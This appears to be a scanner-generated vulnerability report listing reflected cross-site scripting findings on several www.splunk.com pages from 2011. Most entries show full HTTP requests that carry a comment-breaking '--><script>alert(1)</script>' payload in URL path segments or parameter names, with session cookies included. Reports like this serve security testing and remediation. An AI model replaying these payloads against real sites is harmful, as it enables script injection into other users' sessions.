GET /view/resources88525--><script>alert(1)</script>542705b5975/SP-CAAACGF HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload 144ec--><script>alert(1)</script>639ac29d6d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/resources/SP-CAAACGF144ec--><script>alert(1)</script>639ac29d6d6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.595. http://www.splunk.com/view/resources/SP-CAAACGF [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/resources/SP-CAAACGF
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 919c2--><script>alert(1)</script>3982ac994f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/resources/SP-CAAACGF?919c2--><script>alert(1)</script>3982ac994f=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:19:06 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: eb9cfeb9d7a6e24325ffde2edf44b8c41296944348 Last-Modified: Sat, 05 Feb 2011 22:19:08 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 50164
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload d450f--><script>alert(1)</script>42a7031b7c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewd450f--><script>alert(1)</script>42a7031b7c6/security-and-compliance-solutions/SP-CAAADSB HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:16:38 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:46:38 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:46:38 GMT; path=/ ETag: 49a34c81e83c003ee467cf27bae2c8db1296944198 Last-Modified: Sat, 05 Feb 2011 22:16:38 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18467
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 3a9fd--><script>alert(1)</script>47564be78ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/security-and-compliance-solutions3a9fd--><script>alert(1)</script>47564be78ef/SP-CAAADSB HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:17:11 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:47:11 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:47:11 GMT; path=/ ETag: d4641a57ecb4344e9a6e8705a84e0a831296944231 Last-Modified: Sat, 05 Feb 2011 22:17:11 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18467
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload 1d314--><script>alert(1)</script>526c94c9c44 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/security-and-compliance-solutions/SP-CAAADSB1d314--><script>alert(1)</script>526c94c9c44 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5179e--><script>alert(1)</script>3f029930d0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/security-and-compliance-solutions/SP-CAAADSB?5179e--><script>alert(1)</script>3f029930d0d=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:15:44 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 37770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 378fb--><script>alert(1)</script>e6e9887ca3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view378fb--><script>alert(1)</script>e6e9887ca3e/services/SP-CAAAFQJ HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:14 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:14 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:14 GMT; path=/ ETag: 5949bb1f2c981ebe7624e1a800aec3141296944114 Last-Modified: Sat, 05 Feb 2011 22:15:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 96328--><script>alert(1)</script>d3930effb69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/services96328--><script>alert(1)</script>d3930effb69/SP-CAAAFQJ HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:50 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:50 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:50 GMT; path=/ ETag: 3c6b33044d2348f7f74840f87a9fe1eb1296944151 Last-Modified: Sat, 05 Feb 2011 22:15:51 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload b9fea--><script>alert(1)</script>abceb6f05bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/services/SP-CAAAFQJb9fea--><script>alert(1)</script>abceb6f05bb HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.603. http://www.splunk.com/view/services/SP-CAAAFQJ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/services/SP-CAAAFQJ
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d63cc--><script>alert(1)</script>8e0336acb25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/services/SP-CAAAFQJ?d63cc--><script>alert(1)</script>8e0336acb25=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:14:29 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: dfa359c45172d7ec39a902328d590b171296944071 Last-Modified: Sat, 05 Feb 2011 22:14:31 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34860
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 6480e--><script>alert(1)</script>5d666728ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view6480e--><script>alert(1)</script>5d666728ac/splunk-at-whitepages/SP-CAAAFUY HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
